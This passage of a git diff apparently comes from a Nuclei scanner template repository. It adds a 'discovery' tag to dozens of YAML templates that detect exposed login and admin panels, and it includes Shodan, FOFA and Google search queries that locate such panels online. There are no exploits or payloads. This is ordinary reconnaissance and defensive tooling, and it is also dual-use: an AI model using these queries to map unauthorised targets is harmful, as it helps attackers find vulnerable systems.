"{{BaseURL}}/ui/login.action" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "<title>VMware Aria Operations" - - - type: status - status: +id: vmware-aria-panel + +info: + name: VMware Aria Operations Login - Detect + author: rxerium + severity: info + description: | + Detects VMware Aria Operations Panel. + metadata: + verified: true + max-request: 1 + shodan-query: title:"VMware Aria Operations" + tags: panel,aria,login,detect,discovery + +http: + - method: GET + path: + - "{{BaseURL}}/ui/login.action" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "VMware Aria Operations" + + - type: status + status: - 200 # digest: 4a0a00473045022078a1b05d50ea0a2464bd487afa24bafb9533a4523a8f7549edb919dce171b34a0221009f35d6083b2b55354af53fbee7e3741dc79a8362d0b006af44e2c34a4ad5afe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/vmware-carbon-black-edr.yaml b/http/exposed-panels/vmware-carbon-black-edr.yaml index 25bdc9360fb..bff50b5ff6d 100644 --- a/http/exposed-panels/vmware-carbon-black-edr.yaml +++ b/http/exposed-panels/vmware-carbon-black-edr.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"VMware Carbon Black EDR" - tags: panel,vmware + tags: panel,vmware,discovery http: - method: GET diff --git a/http/exposed-panels/vmware-cloud-availability.yaml b/http/exposed-panels/vmware-cloud-availability.yaml index 2ac75b3ed78..29ce43fc645 100644 --- a/http/exposed-panels/vmware-cloud-availability.yaml +++ b/http/exposed-panels/vmware-cloud-availability.yaml @@ -15,7 +15,7 @@ info: shodan-query: title:"VMware Cloud Director Availability" product: cloud_director vendor: vmware - tags: panel,vmware + tags: panel,vmware,discovery http: - method: GET diff --git a/http/exposed-panels/vmware-cloud-director.yaml b/http/exposed-panels/vmware-cloud-director.yaml index e9ae6cbbe97..81dc0f043c8 100644 --- a/http/exposed-panels/vmware-cloud-director.yaml +++ b/http/exposed-panels/vmware-cloud-director.yaml @@ -19,7 +19,7 @@ info: - http.title:"welcome to vmware cloud director" fofa-query: title="welcome to vmware cloud director" google-query: intitle:"welcome to vmware cloud director" - tags: panel,vmware + tags: panel,vmware,discovery http: - method: GET diff --git a/http/exposed-panels/vmware-ftp-server.yaml b/http/exposed-panels/vmware-ftp-server.yaml index ee26dc80fce..c4e4555732c 100644 --- a/http/exposed-panels/vmware-ftp-server.yaml +++ b/http/exposed-panels/vmware-ftp-server.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"VMWARE FTP SERVER" - tags: panel,vmware,ftp + tags: panel,vmware,ftp,discovery http: - method: GET diff --git a/http/exposed-panels/vmware-hcx-login.yaml b/http/exposed-panels/vmware-hcx-login.yaml index 1d07e756fce..0347670d0d3 100644 --- a/http/exposed-panels/vmware-hcx-login.yaml +++ b/http/exposed-panels/vmware-hcx-login.yaml @@ -15,7 +15,7 @@ info: shodan-query: title:"VMware HCX" product: vmware_hcx vendor: vmware - tags: panel,vmware + tags: panel,vmware,discovery http: - method: GET diff --git a/http/exposed-panels/vmware-horizon-daas.yaml b/http/exposed-panels/vmware-horizon-daas.yaml index a0ce8d17bce..8e71cebf4af 100644 --- a/http/exposed-panels/vmware-horizon-daas.yaml +++ b/http/exposed-panels/vmware-horizon-daas.yaml @@ -16,7 +16,7 @@ info: - http.title:"horizon daas" fofa-query: title="horizon daas" google-query: intitle:"horizon daas" - tags: panel,vmware + tags: panel,vmware,discovery http: - method: GET diff --git a/http/exposed-panels/vmware-horizon-panel.yaml b/http/exposed-panels/vmware-horizon-panel.yaml index 04ef16fb389..cb8a2a79c3a 100644 --- a/http/exposed-panels/vmware-horizon-panel.yaml +++ b/http/exposed-panels/vmware-horizon-panel.yaml @@ -15,7 +15,7 @@ info: max-request: 2 vendor: vmware product: horizon - tags: horizon,vmware,edb,panel + tags: horizon,vmware,edb,panel,discovery http: - method: GET diff --git a/http/exposed-panels/vmware-nsx-login.yaml b/http/exposed-panels/vmware-nsx-login.yaml index ad3f4817962..6933a0c2cee 100644 --- a/http/exposed-panels/vmware-nsx-login.yaml +++ b/http/exposed-panels/vmware-nsx-login.yaml @@ -15,7 +15,7 @@ info: shodan-query: html:"vmw_nsx_logo-black-triangle-500w.png" product: nsx-t_data_center vendor: vmware - tags: panel,vmware + tags: panel,vmware,discovery http: - method: GET diff --git a/http/exposed-panels/vmware-vcenter-converter-standalone.yaml b/http/exposed-panels/vmware-vcenter-converter-standalone.yaml index ceb2278fea7..8d9fa3d62e8 100644 --- a/http/exposed-panels/vmware-vcenter-converter-standalone.yaml +++ b/http/exposed-panels/vmware-vcenter-converter-standalone.yaml @@ -19,7 +19,7 @@ info: - http.title:"vmware vcenter converter standalone" fofa-query: title="vmware vcenter converter standalone" google-query: intitle:"vmware vcenter converter standalone" - tags: panel,vmware,vcenter + tags: panel,vmware,vcenter,discovery http: - method: GET diff --git a/http/exposed-panels/vmware-vcloud-director.yaml b/http/exposed-panels/vmware-vcloud-director.yaml index 56ca7b940ac..fb7e2775f62 100644 --- a/http/exposed-panels/vmware-vcloud-director.yaml +++ b/http/exposed-panels/vmware-vcloud-director.yaml @@ -19,7 +19,7 @@ info: - http.title:"vmware vcloud director" fofa-query: title="vmware vcloud director" google-query: intitle:"vmware vcloud director" - tags: panel,vmware,vcloud + tags: panel,vmware,vcloud,discovery http: - method: GET diff --git a/http/exposed-panels/vodafone-voxui-panel.yaml b/http/exposed-panels/vodafone-voxui-panel.yaml index 70f52258323..b9b934798a3 100644 --- a/http/exposed-panels/vodafone-voxui-panel.yaml +++ b/http/exposed-panels/vodafone-voxui-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"Vodafone Vox UI" - tags: panel,vodafone + tags: panel,vodafone,discovery http: - method: GET diff --git a/http/exposed-panels/voipmonitor-panel.yaml b/http/exposed-panels/voipmonitor-panel.yaml index 4334e4e0310..83e53ef67f0 100644 --- a/http/exposed-panels/voipmonitor-panel.yaml +++ b/http/exposed-panels/voipmonitor-panel.yaml @@ -18,7 +18,7 @@ info: - http.title:"voipmonitor" fofa-query: title="voipmonitor" google-query: intitle:"voipmonitor" - tags: panel,voipmonitor,login + tags: panel,voipmonitor,login,discovery http: - method: GET diff --git a/http/exposed-panels/vrealize-hyperic-login-panel.yaml b/http/exposed-panels/vrealize-hyperic-login-panel.yaml index 1d38f871ba5..31d8ee41908 100644 --- a/http/exposed-panels/vrealize-hyperic-login-panel.yaml +++ b/http/exposed-panels/vrealize-hyperic-login-panel.yaml @@ -16,7 +16,7 @@ info: shodan-query: http.title:"Sign In - Hyperic" product: hyperic_hq vendor: vmware - tags: login,panel,vrealize,hyperic,detect + tags: login,panel,vrealize,hyperic,detect,discovery http: - method: GET diff --git a/http/exposed-panels/vrealize-loginsight-panel.yaml b/http/exposed-panels/vrealize-loginsight-panel.yaml index 4ab5814bff0..850b324248c 100644 --- a/http/exposed-panels/vrealize-loginsight-panel.yaml +++ b/http/exposed-panels/vrealize-loginsight-panel.yaml @@ -19,7 +19,7 @@ info: - http.title:"vrealize log insight" fofa-query: title="vrealize log insight" google-query: intitle:"vrealize log insight" - tags: panel,vmware,vrealize + tags: panel,vmware,vrealize,discovery http: - method: GET diff --git a/http/exposed-panels/vue-pacs-panel.yaml b/http/exposed-panels/vue-pacs-panel.yaml index 9b03a0b05a5..701cd97ddf6 100644 --- a/http/exposed-panels/vue-pacs-panel.yaml +++ b/http/exposed-panels/vue-pacs-panel.yaml @@ -20,7 +20,7 @@ info: - http.title:"vue pacs" fofa-query: title="vue pacs" google-query: intitle:"vue pacs" - tags: vue,pacs,panel,login,philips + tags: vue,pacs,panel,login,philips,discovery http: - method: GET diff --git a/http/exposed-panels/wago-plc-panel.yaml b/http/exposed-panels/wago-plc-panel.yaml index 33edc803ccd..6f181dd41cd 100644 --- a/http/exposed-panels/wago-plc-panel.yaml +++ b/http/exposed-panels/wago-plc-panel.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,wago + tags: panel,wago,discovery http: - method: GET diff --git a/http/exposed-panels/wagtail-cms-detect.yaml b/http/exposed-panels/wagtail-cms-detect.yaml index 83ec421bf39..13aea502a1b 100644 --- a/http/exposed-panels/wagtail-cms-detect.yaml +++ b/http/exposed-panels/wagtail-cms-detect.yaml @@ -19,7 +19,7 @@ info: - http.title:"wagtail - sign in" fofa-query: title="wagtail - sign in" google-query: intitle:"wagtail - sign in" - tags: panel,wagtail,torchbox + tags: panel,wagtail,torchbox,discovery http: - method: GET diff --git a/http/exposed-panels/wallix-accessmanager-panel.yaml b/http/exposed-panels/wallix-accessmanager-panel.yaml index d8e3d9b1f57..75c30bf0b9b 100644 --- a/http/exposed-panels/wallix-accessmanager-panel.yaml +++ b/http/exposed-panels/wallix-accessmanager-panel.yaml @@ -16,7 +16,7 @@ info: shodan-query: http.title:"Wallix Access Manager" product: bastion_access_manager vendor: wallix - tags: panel,wallix + tags: panel,wallix,discovery http: - method: GET diff --git a/http/exposed-panels/wampserver-homepage.yaml b/http/exposed-panels/wampserver-homepage.yaml index 13177961bac..7bada5e0605 100644 --- a/http/exposed-panels/wampserver-homepage.yaml +++ b/http/exposed-panels/wampserver-homepage.yaml @@ -15,7 +15,7 @@ info: shodan-query: title:"WAMPSERVER Homepage" product: wampserver vendor: wampserver - tags: panel,wampserver + tags: panel,wampserver,discovery http: - method: GET diff --git a/http/exposed-panels/watcher-panel.yaml b/http/exposed-panels/watcher-panel.yaml index d2ce4cf31a3..bf65fa5bb76 100644 --- a/http/exposed-panels/watcher-panel.yaml +++ b/http/exposed-panels/watcher-panel.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: html:"/vsaas/v2/static/" - tags: panel,watcher,login + tags: panel,watcher,login,discovery http: - method: GET diff --git a/http/exposed-panels/watchguard-panel.yaml b/http/exposed-panels/watchguard-panel.yaml index 3cbbadd0e08..d0439456c24 100644 --- a/http/exposed-panels/watchguard-panel.yaml +++ b/http/exposed-panels/watchguard-panel.yaml @@ -15,7 +15,7 @@ info: max-request: 1 vendor: watchguard product: firebox_t15 - tags: watchguard,edb,panel + tags: watchguard,edb,panel,discovery http: - method: GET diff --git a/http/exposed-panels/watershed-panel.yaml b/http/exposed-panels/watershed-panel.yaml index 6d57ac35146..4fd3f2f5eeb 100644 --- a/http/exposed-panels/watershed-panel.yaml +++ b/http/exposed-panels/watershed-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Watershed LRS" - tags: panel,watershed + tags: panel,watershed,discovery http: - method: GET diff --git a/http/exposed-panels/wazuh-panel.yaml b/http/exposed-panels/wazuh-panel.yaml index 415f30e8e7a..82640ea9c47 100644 --- a/http/exposed-panels/wazuh-panel.yaml +++ b/http/exposed-panels/wazuh-panel.yaml @@ -18,7 +18,7 @@ info: - http.title:"wazuh" fofa-query: title="wazuh" google-query: intitle:"wazuh" - tags: panel,wazuh,login + tags: panel,wazuh,login,discovery http: - method: GET diff --git a/http/exposed-panels/wd-mycloud-panel.yaml b/http/exposed-panels/wd-mycloud-panel.yaml index 19b2043b1c2..e4dd8709d42 100644 --- a/http/exposed-panels/wd-mycloud-panel.yaml +++ b/http/exposed-panels/wd-mycloud-panel.yaml @@ -15,7 +15,7 @@ info: product: mycloud_nas shodan-query: http.favicon.hash:-1074357885 fofa-query: icon_hash=-1074357885 - tags: panel,login,mycloud,wd,detect,western_digital + tags: panel,login,mycloud,wd,detect,western_digital,discovery http: - method: GET diff --git a/http/exposed-panels/weatherlink.yaml b/http/exposed-panels/weatherlink.yaml index 14cc683a170..1031b752c81 100644 --- a/http/exposed-panels/weatherlink.yaml +++ b/http/exposed-panels/weatherlink.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,edb + tags: panel,edb,discovery http: - method: GET diff --git a/http/exposed-panels/weave-scope-dashboard.yaml b/http/exposed-panels/weave-scope-dashboard.yaml index 269196acaa8..596752496ff 100644 --- a/http/exposed-panels/weave-scope-dashboard.yaml +++ b/http/exposed-panels/weave-scope-dashboard.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel + tags: panel,discovery http: - method: GET diff --git a/http/exposed-panels/web-file-manager.yaml b/http/exposed-panels/web-file-manager.yaml index fdf5940dcfe..5cb4f0c39e6 100644 --- a/http/exposed-panels/web-file-manager.yaml +++ b/http/exposed-panels/web-file-manager.yaml @@ -15,7 +15,7 @@ info: shodan-query: title:"Web File Manager" product: file_manager vendor: webdesi9 - tags: panel,filemanager + tags: panel,filemanager,discovery http: - method: GET diff --git a/http/exposed-panels/web-local-craft.yaml b/http/exposed-panels/web-local-craft.yaml index bf22328cc70..7792f7f3272 100644 --- a/http/exposed-panels/web-local-craft.yaml +++ b/http/exposed-panels/web-local-craft.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,edb + tags: panel,edb,discovery http: - method: GET diff --git a/http/exposed-panels/web-viewer-panel.yaml b/http/exposed-panels/web-viewer-panel.yaml index d9e385e1a69..d03df5dc4cc 100644 --- a/http/exposed-panels/web-viewer-panel.yaml +++ b/http/exposed-panels/web-viewer-panel.yaml @@ -16,7 +16,7 @@ info: - http.title:"web viewer for samsung dvr" fofa-query: title="web viewer for samsung dvr" google-query: intitle:"web viewer for samsung dvr" - tags: panel,web-viewer,detect,samsung + tags: panel,web-viewer,detect,samsung,discovery http: - method: GET diff --git a/http/exposed-panels/webcomco-panel.yaml b/http/exposed-panels/webcomco-panel.yaml index e72debd093a..713e96a83e7 100644 --- a/http/exposed-panels/webcomco-panel.yaml +++ b/http/exposed-panels/webcomco-panel.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"WebcomCo" - tags: panel,webcomco,login + tags: panel,webcomco,login,discovery http: - method: GET diff --git a/http/exposed-panels/webeditors-check-detect.yaml b/http/exposed-panels/webeditors-check-detect.yaml index 18453e5644c..bcb1dd48b92 100644 --- a/http/exposed-panels/webeditors-check-detect.yaml +++ b/http/exposed-panels/webeditors-check-detect.yaml @@ -14,7 +14,7 @@ info: vendor: ckeditor product: ckeditor shodan-query: cpe:"cpe:2.3:a:ckeditor:ckeditor" - tags: panel,webeditors,ckeditor + tags: panel,webeditors,ckeditor,discovery http: - method: GET diff --git a/http/exposed-panels/weblogic-login.yaml b/http/exposed-panels/weblogic-login.yaml index 128579a9d08..09ca3fb8822 100644 --- a/http/exposed-panels/weblogic-login.yaml +++ b/http/exposed-panels/weblogic-login.yaml @@ -19,7 +19,7 @@ info: - http.title:"oracle peoplesoft sign-in" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" - tags: panel,oracle,weblogic,login + tags: panel,oracle,weblogic,login,discovery http: - method: GET diff --git a/http/exposed-panels/weblogic-uddiexplorer.yaml b/http/exposed-panels/weblogic-uddiexplorer.yaml index e6609d0a82b..3aa09e14b48 100644 --- a/http/exposed-panels/weblogic-uddiexplorer.yaml +++ b/http/exposed-panels/weblogic-uddiexplorer.yaml @@ -21,7 +21,7 @@ info: - http.title:"oracle peoplesoft sign-in" fofa-query: title="oracle peoplesoft sign-in" google-query: intitle:"oracle peoplesoft sign-in" - tags: panel,oracle,weblogic,tenable + tags: panel,oracle,weblogic,tenable,discovery http: - method: GET diff --git a/http/exposed-panels/webmin-panel.yaml b/http/exposed-panels/webmin-panel.yaml index 354bdc4938b..327a5d370eb 100644 --- a/http/exposed-panels/webmin-panel.yaml +++ b/http/exposed-panels/webmin-panel.yaml @@ -16,7 +16,7 @@ info: shodan-query: http.title:"webmin" fofa-query: title="webmin" google-query: intitle:"webmin" - tags: panel,webmin + tags: panel,webmin,discovery http: - method: GET diff --git a/http/exposed-panels/webmodule-ee-panel.yaml b/http/exposed-panels/webmodule-ee-panel.yaml index fca73adf645..1c18f1b59b1 100644 --- a/http/exposed-panels/webmodule-ee-panel.yaml +++ b/http/exposed-panels/webmodule-ee-panel.yaml @@ -14,7 +14,7 @@ info: max-request: 1 shodan-query: title:"Webmodule" google-query: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version" - tags: edb,panel,webmodule-ee,login + tags: edb,panel,webmodule-ee,login,discovery http: - method: GET diff --git a/http/exposed-panels/webpagetest-panel.yaml b/http/exposed-panels/webpagetest-panel.yaml index 4be2ea09f11..c5153f2e2ab 100644 --- a/http/exposed-panels/webpagetest-panel.yaml +++ b/http/exposed-panels/webpagetest-panel.yaml @@ -14,7 +14,7 @@ info: shodan-query: title:"WebPageTest" product: webpagetest vendor: webpagetest - tags: panel,webpagetest + tags: panel,webpagetest,discovery http: - method: GET diff --git a/http/exposed-panels/webroot-login.yaml b/http/exposed-panels/webroot-login.yaml index 66d2b845d13..2bb41c0eb6c 100644 --- a/http/exposed-panels/webroot-login.yaml +++ b/http/exposed-panels/webroot-login.yaml @@ -15,7 +15,7 @@ info: shodan-query: title:"Webroot - Login" product: secureanywhere vendor: webroot - tags: panel,webroot + tags: panel,webroot,discovery http: - method: GET diff --git a/http/exposed-panels/webshell4-login-panel.yaml b/http/exposed-panels/webshell4-login-panel.yaml index 2647f6cac05..ddd9beb462a 100644 --- a/http/exposed-panels/webshell4-login-panel.yaml +++ b/http/exposed-panels/webshell4-login-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.html:"webshell4" - tags: webshell4,panel + tags: webshell4,panel,discovery http: - method: GET diff --git a/http/exposed-panels/webtitan-cloud-panel.yaml b/http/exposed-panels/webtitan-cloud-panel.yaml index 162f3e14cca..e171a850465 100644 --- a/http/exposed-panels/webtitan-cloud-panel.yaml +++ b/http/exposed-panels/webtitan-cloud-panel.yaml @@ -18,7 +18,7 @@ info: - title="WebTitan" - title="webtitan" - icon_hash=1090061843 - tags: panel,webtitan,cloud,detect,titanhq + tags: panel,webtitan,cloud,detect,titanhq,discovery http: - method: GET diff --git a/http/exposed-panels/webtransfer-client-panel.yaml b/http/exposed-panels/webtransfer-client-panel.yaml index 1335cbd1c10..d79a1ea7e69 100644 --- a/http/exposed-panels/webtransfer-client-panel.yaml +++ b/http/exposed-panels/webtransfer-client-panel.yaml @@ -15,7 +15,7 @@ info: vendor: progress product: moveit_transfer shodan-query: http.title:"Web Transfer Client" - tags: panel,webtransferclient,login,detect + tags: panel,webtransferclient,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/webuzo-admin-panel.yaml b/http/exposed-panels/webuzo-admin-panel.yaml index 08876c013f7..766baf2bb2d 100644 --- a/http/exposed-panels/webuzo-admin-panel.yaml +++ b/http/exposed-panels/webuzo-admin-panel.yaml @@ -19,7 +19,7 @@ info: - http.title:"webuzo - admin panel" fofa-query: title="webuzo - admin panel" google-query: intitle:"webuzo - admin panel" - tags: panel,webuzo,admin,softaculous + tags: panel,webuzo,admin,softaculous,discovery http: - method: GET diff --git a/http/exposed-panels/weiphp-panel.yaml b/http/exposed-panels/weiphp-panel.yaml index 26c3ce12abf..0ffd2995388 100644 --- a/http/exposed-panels/weiphp-panel.yaml +++ b/http/exposed-panels/weiphp-panel.yaml @@ -20,7 +20,7 @@ info: fofa-query: - body="weiphp" - body="weiphp5.0" - tags: panel,weiphp + tags: panel,weiphp,discovery http: - method: GET diff --git a/http/exposed-panels/whatsup-gold-panel.yaml b/http/exposed-panels/whatsup-gold-panel.yaml index da04e19c1d2..88c60746460 100644 --- a/http/exposed-panels/whatsup-gold-panel.yaml +++ b/http/exposed-panels/whatsup-gold-panel.yaml @@ -16,7 +16,7 @@ info: vendor: progress product: whatsup_gold shodan-query: title:"WhatsUp Gold" http.favicon.hash:-2107233094 - tags: panel,whatsup-gold,detect + tags: panel,whatsup-gold,detect,discovery http: - method: GET diff --git a/http/exposed-panels/whm-login-detect.yaml b/http/exposed-panels/whm-login-detect.yaml index b9d9f3ff3b0..d3713fe55bd 100644 --- a/http/exposed-panels/whm-login-detect.yaml +++ b/http/exposed-panels/whm-login-detect.yaml @@ -15,7 +15,7 @@ info: max-request: 1 vendor: cpanel product: whm - tags: edb,whm,panel,login,cpanel + tags: edb,whm,panel,login,cpanel,discovery http: - method: GET diff --git a/http/exposed-panels/wildix-collaboration-panel.yaml b/http/exposed-panels/wildix-collaboration-panel.yaml index 32455fff331..b2ea13d1f06 100644 --- a/http/exposed-panels/wildix-collaboration-panel.yaml +++ b/http/exposed-panels/wildix-collaboration-panel.yaml @@ -1,32 +1,32 @@ -id: wildix-collaboration-panel - -info: - name: Wildix Collaboration Panel - Detect - author: rxerium - severity: info - description: | - Wildix Collaboration login panel was detected. - reference: - - https://www.wildix.com/product/collaboration-ucc-platform/# - classification: - cwe-id: CWE-200 - metadata: - max-request: 1 - verified: true - shodan-query: http.favicon.hash:-1295577382 - tags: panel,login,wildix,detect - -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers: - - type: word - part: server - words: +id: wildix-collaboration-panel + +info: + name: Wildix Collaboration Panel - Detect + author: rxerium + severity: info + description: | + Wildix Collaboration login panel was detected. + reference: + - https://www.wildix.com/product/collaboration-ucc-platform/# + classification: + cwe-id: CWE-200 + metadata: + max-request: 1 + verified: true + shodan-query: http.favicon.hash:-1295577382 + tags: panel,login,wildix,detect,discovery + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers: + - type: word + part: server + words: - "wildix" # digest: 490a00463044022023386f74f9e9e2bb31c7e2f320164df729a44579437c515739975c9bd45c9e02022057913289b0487b9fa9118284b901ff2f6c546b68239b26846afbe2ee439e5650:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/windows-admin-center-panel.yaml b/http/exposed-panels/windows-admin-center-panel.yaml index b57a9f3b5d0..b0bbde9bfda 100644 --- a/http/exposed-panels/windows-admin-center-panel.yaml +++ b/http/exposed-panels/windows-admin-center-panel.yaml @@ -15,7 +15,7 @@ info: fofa-query: - icon_hash="-765377534" - title="Windows Admin Center" - tags: detect,windows,panel + tags: detect,windows,panel,discovery http: - method: GET diff --git a/http/exposed-panels/wingftp-panel.yaml b/http/exposed-panels/wingftp-panel.yaml index e4120299610..33c672c5136 100644 --- a/http/exposed-panels/wingftp-panel.yaml +++ b/http/exposed-panels/wingftp-panel.yaml @@ -23,7 +23,7 @@ info: zoomeye-query: - app="Wing FTP Server" verified: true - tags: panel,login,wingftp + tags: panel,login,wingftp,discovery http: - method: GET diff --git a/http/exposed-panels/wiren-board-webui.yaml b/http/exposed-panels/wiren-board-webui.yaml index 5be3b404658..7102777d8f7 100644 --- a/http/exposed-panels/wiren-board-webui.yaml +++ b/http/exposed-panels/wiren-board-webui.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Wiren Board Web UI" - tags: panel,exposure,wiren + tags: panel,exposure,wiren,discovery http: - method: GET diff --git a/http/exposed-panels/wmw-enterprise-panel.yaml b/http/exposed-panels/wmw-enterprise-panel.yaml index d0d78bd35f6..7359a75b90b 100644 --- a/http/exposed-panels/wmw-enterprise-panel.yaml +++ b/http/exposed-panels/wmw-enterprise-panel.yaml @@ -14,7 +14,7 @@ info: metadata: verified: true max-request: 1 - tags: panel,wmw,detect + tags: panel,wmw,detect,discovery http: - method: GET diff --git a/http/exposed-panels/woodwing-panel.yaml b/http/exposed-panels/woodwing-panel.yaml index c2d9b93d884..e5b8c0e8a6f 100644 --- a/http/exposed-panels/woodwing-panel.yaml +++ b/http/exposed-panels/woodwing-panel.yaml @@ -11,7 +11,7 @@ info: max-request: 2 shodan-query: http.title:"WoodWing Studio Server" fofa-query: title=="WoodWing Studio Server" - tags: woodwing,panel + tags: woodwing,panel,discovery http: - method: GET diff --git a/http/exposed-panels/wordpress-login.yaml b/http/exposed-panels/wordpress-login.yaml index a07da03b8a5..13d6a5b3067 100644 --- a/http/exposed-panels/wordpress-login.yaml +++ b/http/exposed-panels/wordpress-login.yaml @@ -16,7 +16,7 @@ info: shodan-query: - http.component:"wordpress" - cpe:"cpe:2.3:a:wordpress:wordpress" - tags: panel,wordpress + tags: panel,wordpress,discovery http: - method: GET diff --git a/http/exposed-panels/workresources-rdp.yaml b/http/exposed-panels/workresources-rdp.yaml index 74296858fc4..2534bf0674f 100644 --- a/http/exposed-panels/workresources-rdp.yaml +++ b/http/exposed-panels/workresources-rdp.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"RD Web Access" - tags: panel,workresources + tags: panel,workresources,discovery http: - method: GET diff --git a/http/exposed-panels/workspace-one-uem-ssp.yaml b/http/exposed-panels/workspace-one-uem-ssp.yaml index 2857c3e14e4..ff599ee3f4f 100644 --- a/http/exposed-panels/workspace-one-uem-ssp.yaml +++ b/http/exposed-panels/workspace-one-uem-ssp.yaml @@ -21,7 +21,7 @@ info: - http.favicon.hash:"321909464" - http.html:"Self-Service Portal" fofa-query: body="ssp loginscreen" - tags: panel,workspaceone,vmware,airwatch,ssp,login,detect + tags: panel,workspaceone,vmware,airwatch,ssp,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/workspace-one-uem.yaml b/http/exposed-panels/workspace-one-uem.yaml index 09d7114b244..d8f30500590 100644 --- a/http/exposed-panels/workspace-one-uem.yaml +++ b/http/exposed-panels/workspace-one-uem.yaml @@ -20,7 +20,7 @@ info: - http.html:"Airwatch" - http.html:"airwatch" fofa-query: body="airwatch" - tags: panel,workspaceone,vmware + tags: panel,workspaceone,vmware,discovery http: - method: GET diff --git a/http/exposed-panels/wowza-streaming-engine.yaml b/http/exposed-panels/wowza-streaming-engine.yaml index bd0fd6393fe..49a4ec464ba 100644 --- a/http/exposed-panels/wowza-streaming-engine.yaml +++ b/http/exposed-panels/wowza-streaming-engine.yaml @@ -17,7 +17,7 @@ info: - cpe:"cpe:2.3:a:wowza:streaming_engine" fofa-query: title="manager" product:"wowza streaming engine" google-query: intitle:"manager" product:"wowza streaming engine" - tags: panel,wowza + tags: panel,wowza,discovery http: - method: GET diff --git a/http/exposed-panels/ws_ftp-server-web-transfer.yaml b/http/exposed-panels/ws_ftp-server-web-transfer.yaml index ec23ec6a267..d86716f142a 100644 --- a/http/exposed-panels/ws_ftp-server-web-transfer.yaml +++ b/http/exposed-panels/ws_ftp-server-web-transfer.yaml @@ -27,7 +27,7 @@ info: google-query: - intitle:"ws_ftp server web transfer" - intitle:"ad hoc transfer" - tags: panel,ws_ftp,progress + tags: panel,ws_ftp,progress,discovery http: - method: GET diff --git a/http/exposed-panels/wso2-management-console.yaml b/http/exposed-panels/wso2-management-console.yaml index 35d3c7cf94b..f6c09a14a91 100644 --- a/http/exposed-panels/wso2-management-console.yaml +++ b/http/exposed-panels/wso2-management-console.yaml @@ -18,7 +18,7 @@ info: shodan-query: http.favicon.hash:1398055326 fofa-query: icon_hash=1398055326 google-query: inurl:"carbon/admin/login" - tags: panel,wso2,edb + tags: panel,wso2,edb,discovery http: - method: GET diff --git a/http/exposed-panels/xds-amr-status.yaml b/http/exposed-panels/xds-amr-status.yaml index 1832df8cb40..823e9f4d6fe 100644 --- a/http/exposed-panels/xds-amr-status.yaml +++ b/http/exposed-panels/xds-amr-status.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"XDS-AMR - status" - tags: panel,tech,xamr,xds + tags: panel,tech,xamr,xds,discovery http: - method: GET diff --git a/http/exposed-panels/xeams-admin-console.yaml b/http/exposed-panels/xeams-admin-console.yaml index 34c1bf36341..8676d955f17 100644 --- a/http/exposed-panels/xeams-admin-console.yaml +++ b/http/exposed-panels/xeams-admin-console.yaml @@ -19,7 +19,7 @@ info: - http.title:"xeams admin" fofa-query: title="xeams admin" google-query: intitle:"xeams admin" - tags: panel,xeams,admin,console,synametrics + tags: panel,xeams,admin,console,synametrics,discovery http: - method: GET diff --git a/http/exposed-panels/xenmobile-login.yaml b/http/exposed-panels/xenmobile-login.yaml index c3c8825f865..7e6309b45e6 100644 --- a/http/exposed-panels/xenmobile-login.yaml +++ b/http/exposed-panels/xenmobile-login.yaml @@ -15,7 +15,7 @@ info: max-request: 1 vendor: citrix product: xenmobile_device_manager_mdm - tags: panel,edb,citrix + tags: panel,edb,citrix,discovery http: - method: GET diff --git a/http/exposed-panels/xfinity-panel.yaml b/http/exposed-panels/xfinity-panel.yaml index 89b60732567..856473392b8 100644 --- a/http/exposed-panels/xfinity-panel.yaml +++ b/http/exposed-panels/xfinity-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"xfinity" - tags: panel,xfinity + tags: panel,xfinity,discovery http: - method: GET diff --git a/http/exposed-panels/xiaomi-wireless-router-login.yaml b/http/exposed-panels/xiaomi-wireless-router-login.yaml index d7ecfe7cf1e..e6224ac4684 100644 --- a/http/exposed-panels/xiaomi-wireless-router-login.yaml +++ b/http/exposed-panels/xiaomi-wireless-router-login.yaml @@ -18,7 +18,7 @@ info: zoomeye-query: app="小米路由器" product: xiaomi_router_ax3200 vendor: mi - tags: panel,xiaomi + tags: panel,xiaomi,discovery http: - method: GET diff --git a/http/exposed-panels/xibocms-login.yaml b/http/exposed-panels/xibocms-login.yaml index 71c95456506..526a2d848df 100644 --- a/http/exposed-panels/xibocms-login.yaml +++ b/http/exposed-panels/xibocms-login.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.html:"/xibosignage/xibo-cms" product: xibo vendor: springsignage - tags: panel,xibocms + tags: panel,xibocms,discovery http: - method: GET diff --git a/http/exposed-panels/xnat-login.yaml b/http/exposed-panels/xnat-login.yaml index 809d35ce61b..6f11e2f4888 100644 --- a/http/exposed-panels/xnat-login.yaml +++ b/http/exposed-panels/xnat-login.yaml @@ 